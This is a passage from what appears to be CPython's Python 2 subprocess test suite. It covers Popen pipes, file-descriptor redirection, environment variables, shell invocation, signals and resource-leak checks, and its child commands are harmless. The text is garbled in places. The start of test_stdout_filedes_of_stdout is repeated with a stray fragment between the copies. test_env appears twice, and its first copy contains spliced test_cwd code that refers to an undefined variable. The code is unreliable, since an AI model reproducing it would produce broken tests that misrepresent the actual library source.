'sys.exit(os.getenv("FRUIT")=="banana")'], env=newenv) self.assertEqual(rc, 1) def test_invalid_args(self): # Popen() called with invalid arguments should raise TypeError # but Popen.__del__ should not complain (issue #12085) with test_support.captured_stderr() as s: self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1) argcount = subprocess.Popen.__init__.__code__.co_argcount too_many_args = [0] * (argcount + 1) self.assertRaises(TypeError, subprocess.Popen, *too_many_args) self.assertEqual(s.getvalue(), '') def test_stdin_none(self): # .stdin is None when not redirected p = subprocess.Popen([sys.executable, "-c", 'print "banana"'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) p.wait() self.assertEqual(p.stdin, None) def test_stdout_none(self): # .stdout is None when not redirected, and the child's stdout will # be inherited from the parent. In order to test this we run a # subprocess in a subprocess: # this_test # \-- subprocess created by this test (parent) # \-- subprocess created by the parent subprocess (child) # The parent doesn't specify stdout, so the child will use the # parent's stdout. This test checks that the message printed by the # child goes to the parent stdout. The parent also checks that the # child's stdout is None. See #11963. 
code = ('import sys; from subprocess import Popen, PIPE;' 'p = Popen([sys.executable, "-c", "print \'test_stdout_none\'"],' ' stdin=PIPE, stderr=PIPE);' 'p.wait(); assert p.stdout is None;') p = subprocess.Popen([sys.executable, "-c", code], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) out, err = p.communicate() self.assertEqual(p.returncode, 0, err) self.assertEqual(out.rstrip(), 'test_stdout_none') def test_stderr_none(self): # .stderr is None when not redirected p = subprocess.Popen([sys.executable, "-c", 'print "banana"'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stdin.close) p.wait() self.assertEqual(p.stderr, None) def test_executable_with_cwd(self): python_dir = os.path.dirname(os.path.realpath(sys.executable)) p = subprocess.Popen(["somethingyoudonthave", "-c", "import sys; sys.exit(47)"], executable=sys.executable, cwd=python_dir) p.wait() self.assertEqual(p.returncode, 47) @unittest.skipIf(sysconfig.is_python_build(), "need an installed Python. See #7774") def test_executable_without_cwd(self): # For a normal installation, it should work without 'cwd' # argument. For test runs in the build directory, see #7774. 
p = subprocess.Popen(["somethingyoudonthave", "-c", "import sys; sys.exit(47)"], executable=sys.executable) p.wait() self.assertEqual(p.returncode, 47) def test_stdin_pipe(self): # stdin redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=subprocess.PIPE) p.stdin.write("pear") p.stdin.close() p.wait() self.assertEqual(p.returncode, 1) def test_stdin_filedes(self): # stdin is set to open file descriptor tf = tempfile.TemporaryFile() d = tf.fileno() os.write(d, "pear") os.lseek(d, 0, 0) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=d) p.wait() self.assertEqual(p.returncode, 1) def test_stdin_fileobj(self): # stdin is set to open file object tf = tempfile.TemporaryFile() tf.write("pear") tf.seek(0) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=tf) p.wait() self.assertEqual(p.returncode, 1) def test_stdout_pipe(self): # stdout redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read(), "orange") def test_stdout_filedes(self): # stdout is set to open file descriptor tf = tempfile.TemporaryFile() d = tf.fileno() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=d) p.wait() os.lseek(d, 0, 0) self.assertEqual(os.read(d, 1024), "orange") def test_stdout_fileobj(self): # stdout is set to open file object tf = tempfile.TemporaryFile() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=tf) p.wait() tf.seek(0) self.assertEqual(tf.read(), "orange") def test_stderr_pipe(self): # stderr redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=subprocess.PIPE) self.addCleanup(p.stderr.close) self.assertStderrEqual(p.stderr.read(), "strawberry") 
def test_stderr_filedes(self): # stderr is set to open file descriptor tf = tempfile.TemporaryFile() d = tf.fileno() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=d) p.wait() os.lseek(d, 0, 0) self.assertStderrEqual(os.read(d, 1024), "strawberry") def test_stderr_fileobj(self): # stderr is set to open file object tf = tempfile.TemporaryFile() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=tf) p.wait() tf.seek(0) self.assertStderrEqual(tf.read(), "strawberry") def test_stderr_redirect_with_no_stdout_redirect(self): # test stderr=STDOUT while stdout=None (not set) # - grandchild prints to stderr # - child redirects grandchild's stderr to its stdout # - the parent should get grandchild's stderr in child's stdout p = subprocess.Popen([sys.executable, "-c", 'import sys, subprocess;' 'rc = subprocess.call([sys.executable, "-c",' ' "import sys;"' ' "sys.stderr.write(\'42\')"],' ' stderr=subprocess.STDOUT);' 'sys.exit(rc)'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = p.communicate() #NOTE: stdout should get stderr from grandchild self.assertStderrEqual(stdout, b'42') self.assertStderrEqual(stderr, b'') # should be empty self.assertEqual(p.returncode, 0) def test_stdout_stderr_pipe(self): # capture stdout and stderr to the same pipe p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) self.addCleanup(p.stdout.close) self.assertStderrEqual(p.stdout.read(), "appleorange") def test_stdout_stderr_file(self): # capture stdout and stderr to the same open file tf = tempfile.TemporaryFile() p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdout=tf, stderr=tf) p.wait() tf.seek(0) self.assertStderrEqual(tf.read(), "appleorange") def 
test_stdout_filedes_of_stdout(self): # stdout is set to 1 (#1531862). # p.wait() tf.seek(0) self.assertStderrEqual(tf.read(), "appleorange") def test_stdout_filedes_of_stdout(self): # stdout is set to 1 (#1531862). # To avoid printing the text on stdout, we do something similar to # test_stdout_none (see above). The parent subprocess calls the child # subprocess passing stdout=1, and this test uses stdout=PIPE in # order to capture and check the output of the parent. See #11963. code = ('import sys, subprocess; ' 'rc = subprocess.call([sys.executable, "-c", ' ' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), ' '\'test with stdout=1\'))"], stdout=1); ' 'assert rc == 18') p = subprocess.Popen([sys.executable, "-c", code], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) out, err = p.communicate() self.assertEqual(p.returncode, 0, err) self.assertEqual(out.rstrip(), 'test with stdout=1') def test_cwd(self): tmpdir = tempfile.gettempdir() # We cannot use os.path.realpath to canonicalize the path, # since it doesn't expand Tru64 {memb} strings. See bug 1063571. 
cwd = os.getcwd() os.chdir(tmpdir) tmpdir = os.getcwd() os.chdir(cwd) p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(os.getcwd())'], stdout=subprocess.PIPE, cwd=tmpdir) self.addCleanup(p.stdout.close) normcase = os.path.normcase self.assertEqual(normcase(p.stdout.read()), normcase(tmpdir)) def test_env(self): newenv = os.environ.copy() newenv["FRUIT"] = "orange" p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(os.getcwd())'], stdout=subprocess.PIPE, cwd=tmpdir) self.addCleanup(p.stdout.close) normcase = os.path.normcase self.assertEqual(normcase(p.stdout.read()), normcase(tmpdir)) def test_env(self): newenv = os.environ.copy() newenv["FRUIT"] = "orange" p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(os.getenv("FRUIT"))'], stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read(), "orange") def test_communicate_stdin(self): p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.exit(sys.stdin.read() == "pear")'], stdin=subprocess.PIPE) p.communicate("pear") self.assertEqual(p.returncode, 1) def test_communicate_stdout(self): p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("pineapple")'], stdout=subprocess.PIPE) (stdout, stderr) = p.communicate() self.assertEqual(stdout, "pineapple") self.assertEqual(stderr, None) def test_communicate_stderr(self): p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("pineapple")'], stderr=subprocess.PIPE) (stdout, stderr) = p.communicate() self.assertEqual(stdout, None) self.assertStderrEqual(stderr, "pineapple") def test_communicate(self): p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stderr.write("pineapple");' 'sys.stdout.write(sys.stdin.read())'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) (stdout, 
stderr) = p.communicate("banana") self.assertEqual(stdout, "banana") self.assertStderrEqual(stderr, "pineapple") # This test is Linux specific for simplicity to at least have # some coverage. It is not a platform specific bug. @unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()), "Linux specific") # Test for the fd leak reported in http://bugs.python.org/issue2791. def test_communicate_pipe_fd_leak(self): fd_directory = '/proc/%d/fd' % os.getpid() num_fds_before_popen = len(os.listdir(fd_directory)) p = subprocess.Popen([sys.executable, "-c", "print()"], stdout=subprocess.PIPE) p.communicate() num_fds_after_communicate = len(os.listdir(fd_directory)) del p num_fds_after_destruction = len(os.listdir(fd_directory)) self.assertEqual(num_fds_before_popen, num_fds_after_destruction) self.assertEqual(num_fds_before_popen, num_fds_after_communicate) def test_communicate_returns(self): # communicate() should return None if no redirection is active p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(47)"]) (stdout, stderr) = p.communicate() self.assertEqual(stdout, None) self.assertEqual(stderr, None) def test_communicate_pipe_buf(self): # communicate() with writes larger than pipe_buf # This test will probably deadlock rather than fail, if # communicate() does not work properly. 
x, y = os.pipe() if mswindows: pipe_buf = 512 else: pipe_buf = os.fpathconf(x, "PC_PIPE_BUF") os.close(x) os.close(y) p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(sys.stdin.read(47));' 'sys.stderr.write("xyz"*%d);' 'sys.stdout.write(sys.stdin.read())' % pipe_buf], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) string_to_write = "abc"*pipe_buf (stdout, stderr) = p.communicate(string_to_write) self.assertEqual(stdout, string_to_write) def test_writes_before_communicate(self): # stdin.write before communicate() p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(sys.stdin.read())'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) p.stdin.write("banana") (stdout, stderr) = p.communicate("split") self.assertEqual(stdout, "bananasplit") self.assertStderrEqual(stderr, "") def test_universal_newlines(self): p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + 'sys.stdout.write("line1\\n");' 'sys.stdout.flush();' 'sys.stdout.write("line2\\r");' 'sys.stdout.flush();' 'sys.stdout.write("line3\\r\\n");' 'sys.stdout.flush();' 'sys.stdout.write("line4\\r");' 'sys.stdout.flush();' 'sys.stdout.write("\\nline5");' 'sys.stdout.flush();' 'sys.stdout.write("\\nline6");'], stdout=subprocess.PIPE, universal_newlines=1) self.addCleanup(p.stdout.close) stdout = p.stdout.read() if hasattr(file, 'newlines'): # Interpreter with universal newline support self.assertEqual(stdout, "line1\nline2\nline3\nline4\nline5\nline6") else: # Interpreter without universal newline support self.assertEqual(stdout, "line1\nline2\rline3\r\nline4\r\nline5\nline6") def test_universal_newlines_communicate(self): # universal newlines through communicate() p = subprocess.Popen([sys.executable, "-c", 
'import sys,os;' + SETBINARY + 'sys.stdout.write("line1\\n");' 'sys.stdout.flush();' 'sys.stdout.write("line2\\r");' 'sys.stdout.flush();' 'sys.stdout.write("line3\\r\\n");' 'sys.stdout.flush();' 'sys.stdout.write("line4\\r");' 'sys.stdout.flush();' 'sys.stdout.write("\\nline5");' 'sys.stdout.flush();' 'sys.stdout.write("\\nline6");'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=1) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) (stdout, stderr) = p.communicate() if hasattr(file, 'newlines'): # Interpreter with universal newline support self.assertEqual(stdout, "line1\nline2\nline3\nline4\nline5\nline6") else: # Interpreter without universal newline support self.assertEqual(stdout, "line1\nline2\rline3\r\nline4\r\nline5\nline6") def test_no_leaking(self): # Make sure we leak no resources if not mswindows: max_handles = 1026 # too much for most UNIX systems else: max_handles = 2050 # too much for (at least some) Windows setups handles = [] try: for i in range(max_handles): try: handles.append(os.open(test_support.TESTFN, os.O_WRONLY | os.O_CREAT)) except OSError as e: if e.errno != errno.EMFILE: raise break else: self.skipTest("failed to reach the file descriptor limit " "(tried %d)" % max_handles) # Close a couple of them (should be enough for a subprocess) for i in range(10): os.close(handles.pop()) # Loop creating some subprocesses. If one of them leaks some fds, # the next loop iteration will fail by reaching the max fd limit. 
for i in range(15): p = subprocess.Popen([sys.executable, "-c", "import sys;" "sys.stdout.write(sys.stdin.read())"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) data = p.communicate(b"lime")[0] self.assertEqual(data, b"lime") finally: for h in handles: os.close(h) test_support.unlink(test_support.TESTFN) def test_list2cmdline(self): self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']), '"a b c" d e') self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']), 'ab\\"c \\ d') self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']), 'ab\\"c " \\\\" d') self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']), 'a\\\\\\b "de fg" h') self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']), 'a\\\\\\"b c d') self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']), '"a\\\\b c" d e') self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']), '"a\\\\b\\ c" d e') self.assertEqual(subprocess.list2cmdline(['ab', '']), 'ab ""') def test_poll(self): p = subprocess.Popen([sys.executable, "-c", "import time; time.sleep(1)"]) count = 0 while p.poll() is None: time.sleep(0.1) count += 1 # We expect that the poll loop probably went around about 10 times, # but, based on system scheduling we can't control, it's possible # poll() never returned None. It "should be" very rare that it # didn't go around at least twice. self.assertGreaterEqual(count, 2) # Subsequent invocations should just return the returncode self.assertEqual(p.poll(), 0) def test_wait(self): p = subprocess.Popen([sys.executable, "-c", "import time; time.sleep(2)"]) self.assertEqual(p.wait(), 0) # Subsequent invocations should just return the returncode self.assertEqual(p.wait(), 0) def test_invalid_bufsize(self): # an invalid type of the bufsize argument should raise # TypeError. 
with self.assertRaises(TypeError): subprocess.Popen([sys.executable, "-c", "pass"], "orange") def test_leaking_fds_on_error(self): # see bug #5179: Popen leaks file descriptors to PIPEs if # the child fails to execute; this will eventually exhaust # the maximum number of open fds. 1024 seems a very common # value for that limit, but Windows has 2048, so we loop # 1024 times (each call leaked two fds). for i in range(1024): # Windows raises IOError. Others raise OSError. with self.assertRaises(EnvironmentError) as c: subprocess.Popen(['nonexisting_i_hope'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) # ignore errors that indicate the command was not found if c.exception.errno not in (errno.ENOENT, errno.EACCES): raise c.exception @unittest.skipIf(threading is None, "threading required") def test_double_close_on_error(self): # Issue #18851 fds = [] def open_fds(): for i in range(20): fds.extend(os.pipe()) time.sleep(0.001) t = threading.Thread(target=open_fds) t.start() try: with self.assertRaises(EnvironmentError): subprocess.Popen(['nonexisting_i_hope'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) finally: t.join() exc = None for fd in fds: # If a double close occurred, some of those fds will # already have been closed by mistake, and os.close() # here will raise. 
try: os.close(fd) except OSError as e: exc = e if exc is not None: raise exc def test_handles_closed_on_exception(self): # If CreateProcess exits with an error, ensure the # duplicate output handles are released ifhandle, ifname = tempfile.mkstemp() ofhandle, ofname = tempfile.mkstemp() efhandle, efname = tempfile.mkstemp() try: subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle, stderr=efhandle) except OSError: os.close(ifhandle) os.remove(ifname) os.close(ofhandle) os.remove(ofname) os.close(efhandle) os.remove(efname) self.assertFalse(os.path.exists(ifname)) self.assertFalse(os.path.exists(ofname)) self.assertFalse(os.path.exists(efname)) def test_communicate_epipe(self): # Issue 10963: communicate() should hide EPIPE p = subprocess.Popen([sys.executable, "-c", 'pass'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) p.communicate("x" * 2**20) def test_communicate_epipe_only_stdin(self): # Issue 10963: communicate() should hide EPIPE p = subprocess.Popen([sys.executable, "-c", 'pass'], stdin=subprocess.PIPE) self.addCleanup(p.stdin.close) time.sleep(2) p.communicate("x" * 2**20) # This test is Linux-ish specific for simplicity to at least have # some coverage. It is not a platform specific bug. @unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()), "Linux specific") def test_failed_child_execute_fd_leak(self): """Test for the fork() failure fd leak reported in issue16327.""" fd_directory = '/proc/%d/fd' % os.getpid() fds_before_popen = os.listdir(fd_directory) with self.assertRaises(PopenTestException): PopenExecuteChildRaises( [sys.executable, '-c', 'pass'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # NOTE: This test doesn't verify that the real _execute_child # does not close the file descriptors itself on the way out # during an exception. Code inspection has confirmed that. 
fds_after_exception = os.listdir(fd_directory) self.assertEqual(fds_before_popen, fds_after_exception) # context manager class _SuppressCoreFiles(object): """Try to prevent core files from being created.""" old_limit = None def __enter__(self): """Try to save previous ulimit, then set it to (0, 0).""" if resource is not None: try: self.old_limit = resource.getrlimit(resource.RLIMIT_CORE) resource.setrlimit(resource.RLIMIT_CORE, (0, 0)) except (ValueError, resource.error): pass if sys.platform == 'darwin': # Check if the 'Crash Reporter' on OSX was configured # in 'Developer' mode and warn that it will get triggered # when it is. # # This assumes that this context manager is used in tests # that might trigger the next manager. value = subprocess.Popen(['/usr/bin/defaults', 'read', 'com.apple.CrashReporter', 'DialogType'], stdout=subprocess.PIPE).communicate()[0] if value.strip() == b'developer': print "this tests triggers the Crash Reporter, that is intentional" sys.stdout.flush() def __exit__(self, *args): """Return core file behavior to default.""" if self.old_limit is None: return if resource is not None: try: resource.setrlimit(resource.RLIMIT_CORE, self.old_limit) except (ValueError, resource.error): pass @unittest.skipUnless(hasattr(signal, 'SIGALRM'), "Requires signal.SIGALRM") def test_communicate_eintr(self): # Issue #12493: communicate() should handle EINTR def handler(signum, frame): pass old_handler = signal.signal(signal.SIGALRM, handler) self.addCleanup(signal.signal, signal.SIGALRM, old_handler) # the process is running for 2 seconds args = [sys.executable, "-c", 'import time; time.sleep(2)'] for stream in ('stdout', 'stderr'): kw = {stream: subprocess.PIPE} with subprocess.Popen(args, **kw) as process: signal.alarm(1) # communicate() will be interrupted by SIGALRM process.communicate() @unittest.skipIf(mswindows, "POSIX specific tests") class POSIXProcessTestCase(BaseTestCase): def test_exceptions(self): # caught & re-raised exceptions with 
self.assertRaises(OSError) as c: p = subprocess.Popen([sys.executable, "-c", ""], cwd="/this/path/does/not/exist") # The attribute child_traceback should contain "os.chdir" somewhere. self.assertIn("os.chdir", c.exception.child_traceback) def test_run_abort(self): # returncode handles signal termination with _SuppressCoreFiles(): p = subprocess.Popen([sys.executable, "-c", "import os; os.abort()"]) p.wait() self.assertEqual(-p.returncode, signal.SIGABRT) def test_preexec(self): # preexec function p = subprocess.Popen([sys.executable, "-c", "import sys, os;" "sys.stdout.write(os.getenv('FRUIT'))"], stdout=subprocess.PIPE, preexec_fn=lambda: os.putenv("FRUIT", "apple")) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read(), "apple") class _TestExecuteChildPopen(subprocess.Popen): """Used to test behavior at the end of _execute_child.""" def __init__(self, testcase, *args, **kwargs): self._testcase = testcase subprocess.Popen.__init__(self, *args, **kwargs) def _execute_child( self, args, executable, preexec_fn, close_fds, cwd, env, universal_newlines, startupinfo, creationflags, shell, to_close, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite): try: subprocess.Popen._execute_child( self, args, executable, preexec_fn, close_fds, cwd, env, universal_newlines, startupinfo, creationflags, shell, to_close, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) finally: # Open a bunch of file descriptors and verify that # none of them are the same as the ones the Popen # instance is using for stdin/stdout/stderr. 
devzero_fds = [os.open("/dev/zero", os.O_RDONLY) for _ in range(8)] try: for fd in devzero_fds: self._testcase.assertNotIn( fd, (p2cwrite, c2pread, errread)) finally: for fd in devzero_fds: os.close(fd) @unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.") def test_preexec_errpipe_does_not_double_close_pipes(self): """Issue16140: Don't double close pipes on preexec error.""" def raise_it(): raise RuntimeError("force the _execute_child() errpipe_data path.") with self.assertRaises(RuntimeError): self._TestExecuteChildPopen( self, [sys.executable, "-c", "pass"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=raise_it) def test_args_string(self): # args is a string f, fname = tempfile.mkstemp() os.write(f, "#!/bin/sh\n") os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" % sys.executable) os.close(f) os.chmod(fname, 0o700) p = subprocess.Popen(fname) p.wait() os.remove(fname) self.assertEqual(p.returncode, 47) def test_invalid_args(self): # invalid arguments should raise ValueError self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], startupinfo=47) self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], creationflags=47) def test_shell_sequence(self): # Run command through the shell (sequence) newenv = os.environ.copy() newenv["FRUIT"] = "apple" p = subprocess.Popen(["echo $FRUIT"], shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(), "apple") def test_shell_string(self): # Run command through the shell (string) newenv = os.environ.copy() newenv["FRUIT"] = "apple" p = subprocess.Popen("echo $FRUIT", shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(), "apple") def test_call_string(self): # call() function with string argument on UNIX f, fname = tempfile.mkstemp() os.write(f, "#!/bin/sh\n") 
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" % sys.executable) os.close(f) os.chmod(fname, 0700) rc = subprocess.call(fname) os.remove(fname) self.assertEqual(rc, 47) def test_specific_shell(self): # Issue #9265: Incorrect name passed as arg[0]. shells = [] for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']: for name in ['bash', 'ksh']: sh = os.path.join(prefix, name) if os.path.isfile(sh): shells.append(sh) if not shells: # Will probably work for any shell but csh. self.skipTest("bash or ksh required for this test") sh = '/bin/sh' if os.path.isfile(sh) and not os.path.islink(sh): # Test will fail if /bin/sh is a symlink to csh. shells.append(sh) for sh in shells: p = subprocess.Popen("echo $0", executable=sh, shell=True, stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(), sh) def _kill_process(self, method, *args): # Do not inherit file handles from the parent. # It should fix failures on some platforms. p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() time.sleep(30) """], close_fds=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) getattr(p, method)(*args) return p @unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')), "Due to known OS bug (issue #16762)") def _kill_dead_process(self, method, *args): # Do not inherit file handles from the parent. # It should fix failures on some platforms. p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() """], close_fds=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # Wait for the interpreter to be completely initialized before # sending any signal. 
p.stdout.read(1) # The process should end after this time.sleep(1) # This shouldn't raise even though the child is now dead getattr(p, method)(*args) p.communicate() def test_send_signal(self): p = self._kill_process('send_signal', signal.SIGINT) _, stderr = p.communicate() self.assertIn('KeyboardInterrupt', stderr) self.assertNotEqual(p.wait(), 0) def test_kill(self): p = self._kill_process('kill') _, stderr = p.communicate() self.assertStderrEqual(stderr, '') self.assertEqual(p.wait(), -signal.SIGKILL) def test_terminate(self): p = self._kill_process('terminate') _, stderr = p.communicate() self.assertStderrEqual(stderr, '') self.assertEqual(p.wait(), -signal.SIGTERM) def test_send_signal_dead(self): # Sending a signal to a dead process self._kill_dead_process('send_signal', signal.SIGINT) def test_kill_dead(self): # Killing a dead process self._kill_dead_process('kill') def test_terminate_dead(self): # Terminating a dead process self._kill_dead_process('terminate') def check_close_std_fds(self, fds): # Issue #9905: test that subprocess pipes still work properly with # some standard fds closed stdin = 0 newfds = [] for a in fds: b = os.dup(a) newfds.append(b) if a == 0: stdin = b try: for fd in fds: os.close(fd) out, err = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate() err = test_support.strip_python_stderr(err) self.assertEqual((out, err), (b'apple', b'orange')) finally: for b, a in zip(newfds, fds): os.dup2(b, a) for b in newfds: os.close(b) def test_close_fd_0(self): self.check_close_std_fds([0]) def test_close_fd_1(self): self.check_close_std_fds([1]) def test_close_fd_2(self): self.check_close_std_fds([2]) def test_close_fds_0_1(self): self.check_close_std_fds([0, 1]) def test_close_fds_0_2(self): self.check_close_std_fds([0, 2]) def test_close_fds_1_2(self): self.check_close_std_fds([1, 2]) def 
test_close_fds_0_1_2(self): # Issue #10806: test that subprocess pipes still work properly with # all standard fds closed. self.check_close_std_fds([0, 1, 2]) def check_swap_fds(self, stdin_no, stdout_no, stderr_no): # open up some temporary files temps = [tempfile.mkstemp() for i in range(3)] temp_fds = [fd for fd, fname in temps] try: # unlink the files -- we won't need to reopen them for fd, fname in temps: os.unlink(fname) # save a copy of the standard file descriptors saved_fds = [os.dup(fd) for fd in range(3)] try: # duplicate the temp files over the standard fd's 0, 1, 2 for fd, temp_fd in enumerate(temp_fds): os.dup2(temp_fd, fd) # write some data to what will become stdin, and rewind os.write(stdin_no, b"STDIN") os.lseek(stdin_no, 0, 0) # now use those files in the given order, so that subprocess # has to rearrange them in the child p = subprocess.Popen([sys.executable, "-c", 'import sys; got = sys.stdin.read();' 'sys.stdout.write("got %s"%got); sys.stderr.write("err")'], stdin=stdin_no, stdout=stdout_no, stderr=stderr_no) p.wait() for fd in temp_fds: os.lseek(fd, 0, 0) out = os.read(stdout_no, 1024) err = test_support.strip_python_stderr(os.read(stderr_no, 1024)) finally: for std, saved in enumerate(saved_fds): os.dup2(saved, std) os.close(saved) self.assertEqual(out, b"got STDIN") self.assertEqual(err, b"err") finally: for fd in temp_fds: os.close(fd) # When duping fds, if there arises a situation where one of the fds is # either 0, 1 or 2, it is possible that it is overwritten (#12607). # This tests all combinations of this. def test_swap_fds(self): self.check_swap_fds(0, 1, 2) self.check_swap_fds(0, 2, 1) self.check_swap_fds(1, 0, 2) self.check_swap_fds(1, 2, 0) self.check_swap_fds(2, 0, 1) self.check_swap_fds(2, 1, 0) def test_wait_when_sigchild_ignored(self): # NOTE: sigchild_ignore.py may not be an effective test on all OSes. 
sigchild_ignore = test_support.findfile("sigchild_ignore.py", subdir="subprocessdata") p = subprocess.Popen([sys.executable, sigchild_ignore], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = p.communicate() self.assertEqual(0, p.returncode, "sigchild_ignore.py exited" " non-zero with this error:\n%s" % stderr) def test_zombie_fast_process_del(self): # Issue #12650: on Unix, if Popen.__del__() was called before the # process exited, it wouldn't be added to subprocess._active, and would # remain a zombie. # spawn a Popen, and delete its reference before it exits p = subprocess.Popen([sys.executable, "-c", 'import sys, time;' 'time.sleep(0.2)'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) ident = id(p) pid = p.pid del p # check that p is in the active processes list self.assertIn(ident, [id(o) for o in subprocess._active]) def test_leak_fast_process_del_killed(self): # Issue #12650: on Unix, if Popen.__del__() was called before the # process exited, and the process got killed by a signal, it would never # be removed from subprocess._active, which triggered a FD and memory # leak. 
        # spawn a Popen, delete its reference and kill it
        p = subprocess.Popen([sys.executable, "-c",
                              'import time;'
                              'time.sleep(3)'],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        ident = id(p)
        pid = p.pid
        del p
        os.kill(pid, signal.SIGKILL)
        # check that p is in the active processes list
        self.assertIn(ident, [id(o) for o in subprocess._active])

        # let some time for the process to exit, and create a new Popen: this
        # should trigger the wait() of p
        time.sleep(0.2)
        with self.assertRaises(EnvironmentError) as c:
            with subprocess.Popen(['nonexisting_i_hope'],
